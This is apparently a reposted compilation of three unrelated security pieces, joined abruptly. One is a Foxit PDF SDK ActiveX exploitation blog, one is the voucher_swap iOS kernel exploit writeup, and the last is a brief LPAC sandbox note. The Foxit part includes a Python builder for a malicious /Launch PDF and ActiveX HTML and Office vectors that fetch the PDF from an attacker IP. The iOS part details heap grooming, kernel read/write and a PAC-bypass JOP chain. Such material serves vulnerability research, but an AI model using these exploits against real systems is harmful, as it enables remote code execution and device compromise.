.text:10481D9D push 0 ; lpCurrentDirectory
.text:10481D9F push 0 ; lpEnvironment
.text:10481DA1 push 0 ; dwCreationFlags
.text:10481DA3 push 0 ; bInheritHandles
.text:10481DA5 push 0 ; lpThreadAttributes
.text:10481DA7 push 0 ; lpProcessAttributes
.text:10481DA9 push eax
.text:10481DAA lea ecx, [ebp+var_10]
.text:10481DAD call sub_10163D59
.text:10481DB2 push eax ; lpCommandLine
.text:10481DB3 push 0 ; lpApplicationName
.text:10481DB5 call ds:CreateProcessW ; rce

This code is reached when parsing a PDF with an /OpenAction of type /Launch. I was also able to bypass any popup by setting the /NewWindow tag to true.
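To make the trigger concrete, here is a sketch of the kind of PDF that reaches this code path. The /OpenAction, /Launch and /NewWindow entries are the ones described above; the exact object layout is an assumption on my part (the original PoC is not reproduced here), as is the assumption that a lenient parser will accept a minimal file without a valid xref table:

```python
# Sketch only: builds a minimal PDF whose open action is a /Launch with
# /NewWindow true. Assumes a lenient parser that tolerates a missing xref
# table. Backslashes are doubled because '\' is an escape in PDF strings.
def build_launch_pdf(command: str) -> bytes:
    target = command.replace("\\", "\\\\").encode()
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Action /S /Launch /NewWindow true /F ("
        + target + b") >>\nendobj\n",
    ]
    return b"%PDF-1.7\n" + b"".join(objs) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"

pdf = build_launch_pdf("c:\\Windows\\System32\\calc.exe")
assert b"/S /Launch /NewWindow true" in pdf
```

Writing the returned bytes to disk gives a file whose open action invokes the attacker-chosen command line once the vulnerable CreateProcessW path is hit.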
Breakpoint 0 hit
eax=05de3fc4 ebx=05f58dc8 ecx=001dee6c edx=001dee18 esi=001dee94 edi=05b07f50
eip=04ae1db5 esp=001dede8 ebp=001dee7c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x7c5:
04ae1db5 ff155403ce04 call dword ptr [FoxitPDFSDK_AX_Std!DllCanUnloadNow+0x5da73 (04ce0354)] ds:0023:04ce0354={kernel32!CreateProcessW (75d5204d)}
0:000> du poi(@esp+4)
05de3fc4 "c:\Windows\System32\calc.exe" <-- whatever we want
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
001dee7c 04ae2612 440f2825 05f58dc8 05ff3fd8 FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x7c5
001deecc 04ae27e6 05f10fe8 05ff3fd8 05b07f50 FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x1022
001deef8 04ae90be 05f58dc8 440f29c9 00000000 FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x11f6
001def20 0466c70f 001def74 05dbbf80 440f297d FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x7ace
001def94 046766f7 05d6cfd8 04f3d4c8 440f2925 FoxitPDFSDK_AX_Std!IReader_ContentProvider::GetDisplayStartDate+0x4caf
001defcc 046b789a 06339fd4 001def9c 046958f3 FoxitPDFSDK_AX_Std!DllUnregisterServer+0x328e
001df07c 046961f0 04ce7ea8 00000001 001df184 FoxitPDFSDK_AX_Std!IReader_ContentProvider::SetSource+0x2c106
001df114 1005cf6a 00000001 0000000f 0fe4c2b4 FoxitPDFSDK_AX_Std!IReader_ContentProvider::SetSource+0xaa5c
001df1e0 1004819a 0000000f 00000001 0000000b mfc140u+0x29cf6a
001df208 100a4a52 0000000f 00000001 0000000b mfc140u+0x28819a
001df230 00c83c87 001dfb64 0000000f 00000001 mfc140u+0x2e4a52
001df2a0 1001e03d 00000110 00000000 001df2dc image00c80000+0x3c87
001df2b0 7717c4b7 0009048a 00000110 0008047a mfc140u+0x25e03d
001df2dc 77195825 1001e000 0009048a 00000110 USER32!gapfnScSendMessage+0x1cf
001df358 771959c3 00000000 1001e000 0009048a USER32!CreateDialogParamW+0x225
001df3a0 77195bb3 00000000 00000110 0008047a USER32!CreateDialogParamW+0x3c3
001df3bc 7717c4b7 0009048a 00000110 0008047a USER32!DefDlgProcW+0x22
001df3e8 7717c5b7 77195b91 0009048a 00000110 USER32!gapfnScSendMessage+0x1cf
001df460 77171b01 00000000 77195b91 0009048a USER32!gapfnScSendMessage+0x2cf
001df490 77171b27 77195b91 0009048a 00000110 USER32!PeekMessageA+0x18c

CVE-2018-19447 - URI Parsing Stack Based Buffer Overflow
While I was reversing for the logic issues, I happened to stumble upon a neat stack buffer overflow in sub_104CC8B0 at loc_104CC981 when attempting to copy user supplied URIs to the String1 buffer:

.text:104CC981 loc_104CC981: ; CODE XREF: sub_104CC8B0+C3
.text:104CC981 ; sub_104CC8B0+CA
.text:104CC981 push offset word_106837E0 ; lpString2
.text:104CC986 lea eax, [ebp+String1]
.text:104CC98C push eax ; lpString1
.text:104CC98D call ebx ; lstrcatW
.text:104CC98F push edi ; lpString2
.text:104CC990 lea ecx, [ebp+String1]
.text:104CC996 push ecx ; lpString1
.text:104CC997 call ebx ; calls lstrcatW to trigger the stack overflow

This function was protected via stack cookies and /SAFESEH was enabled at compile time, making this much harder to exploit. Having said that, we will see how we can circumvent these protections in upcoming blog posts!

STATUS_STACK_BUFFER_OVERRUN encountered
(a50.1064): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=2da3944c ecx=75e9e4f4 edx=0031c085 esi=00000000 edi=238c2f50
eip=75e9e371 esp=0031c2cc ebp=0031c348 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
kernel32!UnhandledExceptionFilter+0x5f:
75e9e371 cc int 3
0:000> kv L10
# ChildEBP RetAddr Args to Child
00 0031c348 2d4cd47d 2da3944c 96120647 69edf9b8 kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo])
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0031c67c 2d84ca09 00000044 00000000 00000000 FoxitPDFSDK_AX_Std!IReader_ContentProvider::GetDocEventHandler+0x12427
02 0031caec 00410041 00410041 00410041 00410041 FoxitPDFSDK_AX_Std!IReader_ContentProvider::CreateContentProvider+0x4b419
03 0031caf0 00410041 00410041 00410041 00410041 0x410041
04 0031caf4 00410041 00410041 00410041 00410041 0x410041
05 0031caf8 00410041 00410041 00410041 00410041 0x410041
06 0031cafc 00410041 00410041 00410041 00410041 0x410041
07 0031cb00 00410041 00410041 00410041 00410041 0x410041
08 0031cb04 00410041 00410041 00410041 00410041 0x410041
09 0031cb08 00410041 00410041 00410041 00410041 0x410041
0a 0031cb0c 00410041 00410041 00410041 00410041 0x410041
0b 0031cb10 00410041 00410041 00410041 00410041 0x410041
0c 0031cb14 00410041 00410041 00410041 00410041 0x410041
0d 0031cb18 00410041 00410041 00410041 00410041 0x410041
0e 0031cb1c 00410041 00410041 00410041 00410041 0x410041
0f 0031cb20 00410041 00410041 00410041 00410041 0x410041
0:000> !exchain
0031c338: kernel32!_except_handler4+0 (75eca332)
CRT scope 0, filter: kernel32!UnhandledExceptionFilter+69 (75e9e37e)
func: kernel32!UnhandledExceptionFilter+6d (75e9e382)
0031cc44: 00410041
Invalid exception stack at 00410041

But how are we going to trigger these vulnerabilities?

The Vectors
Since we can’t script anything, we can’t use exposed methods such as OpenFile. However, when inspecting the control further, we can see there is a property that we can probably set called FilePath.

Listing ActiveX properties and methods

Microsoft Internet Explorer
So if we host the following HTML file from remote, we can essentially render a PDF via the ActiveX control without scripting!

<object classid='clsid:F53B7748-643C-4A78-8DBC-01A4855D1A10' id='target' />
<param name="FilePath" value="http://172.16.175.1:9090/sample.pdf" />
</object>

saturn:~$ python -m SimpleHTTPServer 9090
Serving HTTP on 0.0.0.0 port 9090 ...
172.16.175.154 - - [21/Nov/2018 09:48:51] "GET / HTTP/1.1" 200 -
172.16.175.154 - - [21/Nov/2018 09:49:28] "GET /sample.pdf HTTP/1.1" 200 -

The problem with that is, if this site is untrusted (which it probably will be, unless it’s from the local machine zone), then we get this ugly prompt:

Prompts are bad for attackers

After clicking “Allow”, the page does render nicely with our crafted PDF file:

Rendering PDF files in the browser via Foxit.FoxitPDFSDKProCtrl.5

We can see under Manage add-ons that after clicking “Allow” on the prompt, we have our attacker’s IP in the whitelist of sites allowed to run this control.

Whitelist of approved sites to run the Foxit.FoxitPDFSDKProCtrl.5 control

We have a nice vector, given that we can of course run all of this within an iframe and load some cat memes for our victim. But the problem is we are one prompt away from no user interaction, and on top of that, who even uses Internet Explorer these days anyway?

Microsoft Office
So at this point, I decided to go down the route of using Microsoft Office. I would imagine it’s more likely that this product is used in a desktop environment than IE. Also, attack payloads can be crafted for almost all Office documents, working in Excel, Word, PowerPoint, the Outlook preview pane, etc. The Outlook preview pane is particularly nasty, as a user doesn’t even need to open the email that is sent to them, rather just preview it, and we can achieve 100% reliable code execution. The key difference between Office and IE is that there is no prompt for users to run the ActiveX control in Microsoft Word. I tested this on fully patched versions of Office 2013 and Office 2016 Professional using Windows 10 x86 and x64 as the OS. At first I built a poc.docx file, but I had some issues setting the FilePath property in Word directly after entering a string and pressing enter:

Failing to set the FilePath property, thanks Microsoft, very informative!
To solve this, I just crafted the poc.docx with the target ActiveX control and manually modified the word/activeX/activeX1.xml file to set the FilePath ocxPr property and then zipped it all up again. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <ax:ocx ax:classid="{0F6C092B-6E4C-4976-B386-27A9FD9E96A1}" ax:persistence="persistPropertyBag" xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"> <ax:ocxPr ax:name="_Version" ax:value="327680"/> <ax:ocxPr ax:name="_ExtentX" ax:value="16775"/> <ax:ocxPr ax:name="_ExtentY" ax:value="12582"/> <ax:ocxPr ax:name="_StockProps" ax:value="0"/> <ax:ocxPr ax:name="FilePath" ax:value="http://172.16.175.1:9090/poc.pdf"/> Using that as a base, I saved the poc.docx as a poc.rtf file. Then to further enhance the rtf poc, I used a template from CVE-2018-8174. I replaced the objClass htmlfile with the crafted Foxit.FoxitPDFSDKStdCtrl.5 objClass instead from the previously saved poc.rtf file. The final rtf poc seemed clean to me as it was smaller in size and gave more flexibility for obfuscation and IDS avoidance. Proof of Concept || GTFO CVE-2018-19418 and CVE-2018-19447. Feel free to enjoy the video I also made! Conclusion At this point, I would normally recommend users to disable ActiveX, don’t open untrusted links, blah blah, but in reality, there is no warning for users when instantiating trusted (by trusted I mean safe for initialization and safe for scripting) ActiveX controls in Microsoft Office and possibly no way they even know they installed a product that contains third party ActiveX controls. So my message is directed to developers out there. Just stop developing ActiveX controls, period. If you would like to learn how to perform in depth attacks like these against web application targets then feel free to sign up to my training course Full Stack Web Attack in early October this year. 
References
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word/

Source: https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
voucher_swap - Exploit for P0 issue 1731 on iOS 12.1.2 Brandon Azad ---- Issue 1731: CVE-2019-6225 -------------------------------------------------------------------- iOS/macOS: task_swap_mach_voucher() does not respect MIG semantics leading to use-after-free Consider the MIG routine task_swap_mach_voucher(): routine task_swap_mach_voucher( task : task_t; new_voucher : ipc_voucher_t; inout old_voucher : ipc_voucher_t); Here's the (placeholder) implementation: kern_return_t task_swap_mach_voucher( task_t task, ipc_voucher_t new_voucher, ipc_voucher_t *in_out_old_voucher) { if (TASK_NULL == task) return KERN_INVALID_TASK; *in_out_old_voucher = new_voucher; return KERN_SUCCESS; } The correctness of this implementation depends on exactly how MIG ownership semantics are defined for each of these parameters. When dealing with Mach ports and out-of-line memory, ownership follows the traditional rules (the ones violated by the bugs above): All Mach ports (except the first) passed as input parameters are owned by the service routine if and only if the service routine returns success. If the service routine returns failure then MIG will deallocate the ports. All out-of-line memory regions passed as input parameters are owned by the service routine if and only if the service routine returns success. If the service routine returns failure then MIG will deallocate all out-of-line memory. But this is only part of the picture. There are more rules for other types of objects: All objects with defined MIG translations that are passed as input-only parameters are borrowed by the service routine. For reference-counted objects, this means that the service routine is not given a reference, and hence a reference must be added if the service routine intends to keep the object around. All objects with defined MIG translations that are returned in output parameters must be owned by the output parameter. 
For reference-counted objects, this means that output parameters consume a reference on the object.

And most unintuitive of all:

All objects with defined MIG translations that are passed as input in input-output parameters are owned (not borrowed!) by the service routine. This means that the service routine must consume the input object's reference.

Having defined MIG translations means that there is an automatic conversion defined between the object type and its Mach port representation. A task port is one example of such a type: you can convert a task port to the underlying task object using convert_port_to_task(), and you can convert a task to its corresponding port using convert_task_to_port().

Getting back to Mach vouchers, this is the MIG definition of ipc_voucher_t:

    type ipc_voucher_t = mach_port_t
            intran: ipc_voucher_t convert_port_to_voucher(mach_port_t)
            outtran: mach_port_t convert_voucher_to_port(ipc_voucher_t)
            destructor: ipc_voucher_release(ipc_voucher_t)
    ;

This definition means that MIG will automatically convert the voucher port input parameters to ipc_voucher_t objects using convert_port_to_voucher(), convert the ipc_voucher_t output parameters into ports using convert_voucher_to_port(), and discard any extra references using ipc_voucher_release(). Note that convert_port_to_voucher() produces a voucher reference without consuming a port reference, while convert_voucher_to_port() consumes a voucher reference and produces a port reference.

To confirm our understanding of the MIG semantics outlined above, we can look at the function _Xtask_swap_mach_voucher(), which is generated by MIG during the build process:

    mig_internal novalue _Xtask_swap_mach_voucher
            (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
    {
        ...
        kern_return_t RetCode;
        task_t task;
        ipc_voucher_t new_voucher;
        ipc_voucher_t old_voucher;
        ...
        task = convert_port_to_task(In0P->Head.msgh_request_port);
        new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
        old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
        RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
        ipc_voucher_release(new_voucher);
        task_deallocate(task);
        if (RetCode != KERN_SUCCESS) {
            MIG_RETURN_ERROR(OutP, RetCode);
        }
        ...
        if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
            ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
        if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
            ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
        ...
        OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
        OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
        OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
        OutP->msgh_body.msgh_descriptor_count = 1;
    }

Tracing where each of the references are going, we can deduce that:

The new_voucher parameter is deallocated with ipc_voucher_release() after invoking the service routine, so it is not owned by task_swap_mach_voucher(). In other words, task_swap_mach_voucher() is not given a reference on new_voucher.

The old_voucher parameter has a reference on it before it gets overwritten by task_swap_mach_voucher(), which means task_swap_mach_voucher() is being given a reference on the input value of old_voucher.

The value returned by task_swap_mach_voucher() in old_voucher is passed to convert_voucher_to_port(), which consumes a reference on the voucher. Thus, task_swap_mach_voucher() is giving _Xtask_swap_mach_voucher() a reference on the output value of old_voucher.
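The ownership rules traced above can be condensed into a toy model. This is not XNU code: the Voucher class and the two swap functions below are invented for illustration, and they model only the MIG-owned references, not real voucher internals.

```python
class Voucher:
    """Toy stand-in for ipc_voucher_t; tracks only a reference count."""
    def __init__(self):
        self.refs = 1  # the reference MIG hands the service routine

def buggy_swap(new_voucher, in_out):
    # Mirrors the placeholder implementation: the input in-out reference
    # is never released (leak), and no reference is taken on new_voucher
    # before storing it (over-released later by convert_voucher_to_port()).
    in_out[0] = new_voucher

def correct_swap(new_voucher, in_out):
    # What the MIG semantics require: consume the input reference we own
    # and take a new reference on the voucher we hand back.
    in_out[0].refs -= 1
    new_voucher.refs += 1
    in_out[0] = new_voucher
```

Running both variants makes the leak and the missing reference visible: after correct_swap the old voucher's MIG reference is consumed and the new voucher carries the reference the caller will consume; after buggy_swap neither adjustment happens.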
Finally, looking back at the implementation of task_swap_mach_voucher(), we can see that none of these rules are being followed:

    kern_return_t
    task_swap_mach_voucher(
        task_t          task,
        ipc_voucher_t   new_voucher,
        ipc_voucher_t   *in_out_old_voucher)
    {
        if (TASK_NULL == task)
            return KERN_INVALID_TASK;

        *in_out_old_voucher = new_voucher;
        return KERN_SUCCESS;
    }

This results in two separate reference counting issues:

By overwriting the value of in_out_old_voucher without first releasing the reference, we are leaking a reference on the input value of old_voucher.

By assigning the value of new_voucher to in_out_old_voucher without adding a reference, we are consuming a reference we don't own, leading to an over-release of new_voucher.

---- Exploit flow ---------------------------------------------------------------------------------

First we allocate a bunch of pipes so that we can spray pipe buffers later. Then we spray enough Mach ports to fill the ipc.ports zone and cause it to grow and allocate fresh pages from the zone map; 8000 ports is usually sufficient. That way, when we allocate our pipe buffers, there's a high chance the pipe buffers lie directly after the ports in kernel memory. The last port that we allocate is the base port.

Next we write a 16383-byte pattern to our pipe buffers, causing them to allocate from kalloc.16384. XNU limits the global amount of pipe buffer memory to 16 MB, but this is more than sufficient to fill kalloc.16384 and get some pipe buffers allocated after our base port in kernel memory. We fill the pipes with fake Mach ports. For each pipe buffer we fill, we set the fake ports' ip_kotype bits to specify which pair of pipe file descriptors corresponds to this pipe buffer.

Now that we've allocated some pipe buffers directly after the base port, we set up state for triggering the vulnerability. We spray several pages of Mach vouchers, and choose one near the end to be the target for use-after-free.
We want the target voucher to lie on a page containing only sprayed vouchers, so that later we can free all the vouchers on that page and make the page available for zone garbage collection. Then we spray 15% of physical memory size with allocations from kalloc.1024. We'll free this memory later to ensure that there are lots of free pages to encourage zone garbage collection.

Next we stash a pointer to the target voucher in our thread's ith_voucher field using thread_set_mach_voucher(), and then remove the added voucher reference using the task_swap_mach_voucher() vulnerability. This means that even though ith_voucher still points to the target voucher, there's only one reference on it, so just like the rest of the vouchers it'll be freed once we destroy all the voucher ports in userspace.

At this point we free the kalloc.1024 allocations, destroy the voucher ports to free all the vouchers, and start slowly filling kernel memory with out-of-line ports allocations to try and trigger a zone gc and get the page containing our freed target voucher (which ith_voucher still points to) reallocated with out-of-line ports. In my experiments, spraying 17% of physical memory size is sufficient.

We'll try and reallocate the page containing the freed voucher with a pattern of out-of-line Mach ports that overwrites certain fields of the voucher. Specifically, we overwrite the voucher's iv_port field, which specifies the Mach port that exposes this voucher to userspace, with NULL and overwrite the iv_refs field, which is the voucher's reference count, with the lower 32 bits of a pointer to the base port.

Overwriting iv_refs with the lower 32 bits of a pointer to the base port will ensure that the reference count is valid so long as the base port's address is small enough. This is necessary for us to call thread_get_mach_voucher() later without triggering a panic.
Additionally, the pointer to the base port plays double-duty since we'll later use the task_swap_mach_voucher() vulnerability again to increment iv_refs and change what was a pointer to the base port so that it points into our pipe buffers instead.

Once we've reallocated the voucher with our out-of-line ports spray, we call thread_get_mach_voucher(). This interprets ith_voucher, which points into the middle of our out-of-line ports spray, as a Mach voucher, and since iv_port is NULL, a new Mach voucher port is allocated to represent the freed voucher. Then thread_get_mach_voucher() returns the voucher port back to us in userspace, allowing us to continue manipulating the freed voucher while it still overlaps the out-of-line ports array.

Next we increment the voucher's iv_refs field using task_swap_mach_voucher(), which modifies the out-of-line pointer to the base port overlapping iv_refs so that it now points into the pipe buffers. And since we guaranteed that every possible fake port inside the pipe buffers looks valid, we can now safely receive the messages containing the out-of-line ports spray to recover a send right to a fake ipc_port overlapping our pipe buffers.

Our next step is to determine which pair of pipe file descriptors corresponds to the pipe buffer. Since we set each possible fake port's ip_kotype bits earlier while spraying pipe buffers, we can use mach_port_kobject() to retrieve the fake port's ip_kotype and determine the overlapping pipe. And at this point, we can now inspect and modify our fake port by reading and writing the pipe's contents. We can now discard all the filler ports and pipes we allocated earlier, since they're no longer needed.

Our next step is to build a kernel memory read primitive. Although we have a send right to an ipc_port overlapping our pipe buffer, we don't actually know the address of our pipe buffer in kernel memory.
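The iv_refs/pointer overlap used above can be sketched numerically. All addresses and offsets here are hypothetical, chosen only to show why the overlayed refcount stays "sane" and how each leaked reference nudges the overlapping pointer forward by one byte.

```python
# Hypothetical kernel addresses for illustration; not real values.
base_port_addr = 0xFFFFFFE012340000
fake_port_offset = 0x120  # assumed distance from base port into the pipe buffer

def leak_ref(ptr):
    # Each task_swap_mach_voucher() trigger leaks one voucher reference,
    # adding 1 to iv_refs, i.e. to the low 32 bits of the 8-byte
    # out-of-line port pointer it overlaps.
    low = (ptr + 1) & 0xFFFFFFFF
    return (ptr & ~0xFFFFFFFF) | low

ptr = base_port_addr
for _ in range(fake_port_offset):
    ptr = leak_ref(ptr)

# The pointer now targets the fake port inside the pipe buffer...
assert ptr == base_port_addr + fake_port_offset
# ...and the overlayed refcount only looked like a valid, positive count
# because the base port's low address bits were small enough -- which is
# what the heap groom arranges.
assert 0 < (ptr & 0xFFFFFFFF) < 0x80000000
```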
And if we want to use the pid_for_task() trick to read memory, we'll need to build a fake task struct at a known address so that we can make our fake port's ip_kobject field point to it. So our next goal should be to find the address of our pipe buffer.

Unfortunately, unlike prior exploits that have produced a dangling port, we only have a send right to our fake port, not a receive right. This means we have few options for modifying the port's state in such a way that it stores a pointer inside the ipc_port struct that allows us to determine its address.

One thing we can do is call mach_port_request_notification() to generate a request that a dead name notification for the fake port be delivered to the base port. This will cause the kernel to allocate an array in the fake port's ip_requests field and store a pointer to the base port inside that array. Thus, we only need a single 8-byte read to get the address of the base port, and since the base port is at a fixed offset from the fake port (determined by how many times we incremented the freed voucher's iv_refs field), we can use the address of the base port to calculate the address of our pipe buffer.

Of course, that means that in order to build our arbitrary read primitive, we need ... another arbitrary read primitive. So why is this helpful? Because our first read primitive will leak memory every time we use it while the second one will not.

The problem we need to resolve in order to use pid_for_task() to read kernel memory is that we need to get a fake task struct whose bsd_info field points to the address we want to read at a known address in kernel memory. One way to do that is to simply send a Mach message containing our fake task struct to the fake port, and then read out the port's ip_messages.imq_messages field via the pipe to get the address of the ipc_kmsg struct containing the message.
Then we can compute the address of the fake task inside the ipc_kmsg and rewrite the fake port to be a task port pointing to the fake task, allowing us to call pid_for_task() to read 4 bytes of kernel memory. Using this technique, we can read the value of the base port pointer in the ip_requests array and then compute the address of the fake port and the containing pipe buffer. And once we know the address of the pipe buffer, we can create the fake task by writing to our pipe to avoid leaking memory on each read.

Now that we have a stable kernel read primitive, we can find the address of the host port and read out the host port's ip_receiver field to get the address of the kernel's ipc_space. I then borrow Ian's technique of iterating through all the ipc_port elements in the host port's zalloc block looking for the kernel task port. Once we find the kernel task port, we can read the ip_kobject field to get the kernel task, and reading the task's map field gives us the kernel's vm_map. At this point we have everything we need to build a fake kernel task inside our pipe buffer, giving us the ability to read and write kernel memory using mach_vm_read() and mach_vm_write().

The next step is to build a permanent fake kernel task port. We allocate some kernel memory with mach_vm_allocate() and then write a new fake kernel task into that allocation. We then modify the fake port's ipc_entry in our task so that it points to the new fake kernel task, which allows us to clean up the remaining resources safely. We remove the extra reference on the base port, destroy the voucher port allocated by the call to thread_get_mach_voucher() on the freed voucher, deallocate the ip_requests array, and destroy the leaked ipc_kmsg structs used during our first kernel read primitive. This leaves us with a stable system and a fake kernel task port with which we can read and write kernel memory.
---- Kernel function calling / PAC bypass ---------------------------------------------------------

In order to call kernel functions I use the iokit_user_client_trap() technique. This works without modification on non-PAC devices, but on PAC-enabled devices like the iPhone XS we need to do a little extra work.

First we get a handle to an IOAudio2DeviceUserClient. Since the container sandbox usually prevents us from accessing this class, we briefly replace our proc's credentials with the kernel proc's credentials to bypass the sandbox check. Once we have an IOAudio2DeviceUserClient, we read the value of the user client's trap field, which points to a heap-allocated IOExternalTrap object. Then, to call an arbitrary kernel function, we simply overwrite the trap to point to the target function and then call IOConnectTrap6() from userspace.

This technique has several limitations at this stage: we only control the values of registers X1 - X6, the return value gets truncated to 32 bits, and the function pointer that we call must already have a valid PACIZA signature (that is, a PAC signature using the A-instruction key with context 0). Thus, we'll need to find a way to generate PACIZA signatures on arbitrary functions.

As it turns out, one way to do this is to call the module destructor for the com.apple.nke.lttp kext. There is already a PACIZA'd pointer to the function l2tp_domain_module_stop() in kernel memory, so we already have the ability to call it. And as the final step in tearing down the module, l2tp_domain_module_stop() calls sysctl_unregister_oid() on the sysctl__net_ppp_l2tp global sysctl_oid struct, which resides in writable memory. And on PAC-enabled systems, sysctl_unregister_oid() executes the following instruction sequence on the sysctl_oid struct:

    LDR     X10, [X9,#0x30]!        ;; X10 = old_oidp->oid_handler
    CBNZ    X19, loc_FFFFFFF007EBD330
    CBZ     X10, loc_FFFFFFF007EBD330
    MOV     X19, #0
    MOV     X11, X9                 ;; X11 = &oid_handler
    MOVK    X11, #0x14EF,LSL#48     ;; X11 = 14EF`&oid_handler
    AUTIA   X10, X11                ;; X10 = AUTIA(oid_handler, 14EF`&handler)
    PACIZA  X10                     ;; X10 = PACIZA(X10)
    STR     X10, [X9]               ;; old_oidp->oid_handler = X10

That means that the field sysctl__net_ppp_l2tp->oid_handler will be replaced with the value PACIZA(AUTIA(sysctl__net_ppp_l2tp->oid_handler, )). Clearly we can't forge PACIA signatures at this point, so AUTIA will fail and produce an invalid pointer value. This isn't NULL or some constant sentinel, but rather is the XPAC'd value with two of the pointer extension bits replaced with an error code to make the resulting pointer invalid.

And this is interesting because when PACIZA is used to sign a pointer with invalid extension bits, what actually happens is that first the corrected pointer is signed and then one bit of the PAC signature is flipped, rendering it invalid. What this means for us is that even though sysctl__net_ppp_l2tp->oid_handler was not originally signed, this gadget overwrites the field with a value that is only one bit different from a valid PACIZA signature, allowing us to compute the true PACIZA signature. And if we use this gadget to sign a pointer to a JOP gadget like "mov x0, x4 ; br x5", then we can execute any kernel function we want with up to 4 arguments.

We then use the signed "mov x0, x4 ; br x5" gadget to build a PACIA-signing primitive.
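The one-bit-flip observation reduces to a small search. This sketch is illustrative only: the PAC bit range is an assumption (the real layout depends on the device's virtual address configuration), and in practice the correct candidate is identified by which signed pointer the kernel actually accepts.

```python
def paciza_candidates(corrupted_sig, pac_bit_range):
    # The gadget leaves the correct PACIZA signature with exactly one PAC
    # bit flipped, so the true value is among these single-bit variants.
    return [corrupted_sig ^ (1 << bit) for bit in pac_bit_range]

# Assumed layout for illustration: PAC bits occupy bits 47-62.
PAC_BITS = range(47, 63)

true_sig = 0x52C8FFF007ABC123     # hypothetical valid PACIZA'd pointer
corrupted = true_sig ^ (1 << 55)  # what the gadget stores in oid_handler

candidates = paciza_candidates(corrupted, PAC_BITS)
assert true_sig in candidates
assert len(candidates) == 16  # only a handful of values to try
```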
There are a small number of possible PACIA gadgets, of which we use one that starts:

    PACIA   X9, X10
    STR     X9, [X2,#0xF0]

In order to use this gadget, we execute the following JOP program:

    X1 = &"MOV X10, X3 ; BR X6"
    X2 = KERNEL_BUFFER
    X3 = CONTEXT
    X4 = POINTER
    X5 = &"MOV X9, X0 ; BR X1"
    X6 = &"PACIA X9, X10 ; STR X9, [X2,#0xF0]"

    PC = PACIA("MOV X0, X4 ; BR X5")

    MOV X0, X4
    BR X5
    MOV X9, X0
    BR X1
    MOV X10, X3
    BR X6
    PACIA X9, X10
    STR X9, [X2,#0xF0]

This leaves us with the PACIA'd pointer in kernel memory, which we can read back using our read primitive. Thus, we can now perform arbitrary PACIA forgeries. And using a similar technique with a PACDA gadget, we can produce PACDA forgeries.

All that's left is to get control over X0 when doing a function call. We read in the IOAudio2DeviceUserClient's vtable and use our forgery gadgets to replace IOAudio2DeviceUserClient::getTargetAndTrapForIndex() with IOUserClient::getTargetAndTrapForIndex() and replace IOUserClient::getExternalTrapForIndex() with IORegistryEntry::getRegistryEntryID(). Then we overwrite the user client's registry entry ID field with a pointer to the IOExternalTrap. Finally we write the patched vtable into allocated kernel memory and replace the user client's vtable pointer with a forged pointer to our fake vtable.

And at this point we now have the ability to call arbitrary kernel functions with up to 7 arguments using the iokit_user_client_trap() technique, just like on non-PAC devices.

---- Running the exploit --------------------------------------------------------------------------

For best results, reboot the device and wait a few seconds before running the exploit. I've seen reliability above 99.5% on my devices after a fresh boot (the completed exploit has never failed for me). Running the exploit twice without rebooting will almost certainly panic, since it will mess up the heap groom and possibly result in base port having a too-large address.
After getting kernel read/write and setting up kernel function calling, the exploit will trigger a panic by calling an invalid address with special values in registers X0 - X6 to demonstrate that function calling is successful.

---- Platforms ------------------------------------------------------------------------------------

I've tested on an iPhone 8, iPhone XR, and iPhone XS running iOS 12.1.2. You can add support for other devices in the files voucher_swap/parameters.c and voucher_swap/kernel_call/kc_parameters.c. The exploit currently assumes a 16K kernel page size, although it should be possible to remove this requirement. The PAC bypass also relies on certain gadgets which may be different on other versions or devices.

This vulnerability was fixed in iOS 12.1.3, released January 22, 2019: https://support.apple.com/en-us/HT209443

---- Other exploits -------------------------------------------------------------------------------

This bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) as part of a remote jailbreak. He developed a clever exploit strategy that reallocates the voucher with OSStrings; you can read about it here: http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html

Sursa: https://github.com/OpenJailbreak/voucher_swap
LPAC Sandbox Launcher

Less Privileged AppContainer Sandbox Launcher

Screenshot:

Details:

Important Capabilities for LPAC (minimum)

lpacCom
lpacAppExperience
registryRead

Event Viewer

Applications and Services Logs > Microsoft > Windows > Security-LessPrivilegedAppContainer > Operational

Some activity, but not much detail yet. Likely more detail in future Windows releases.

LPAC File System Access

LPAC is essentially Default Deny AppContainer. You need to give it permissions via capabilities and more. Some example "icacls" commands:

icacls D:\* /grant *S-1-15-2-2:(OI)(CI)(RX) /T

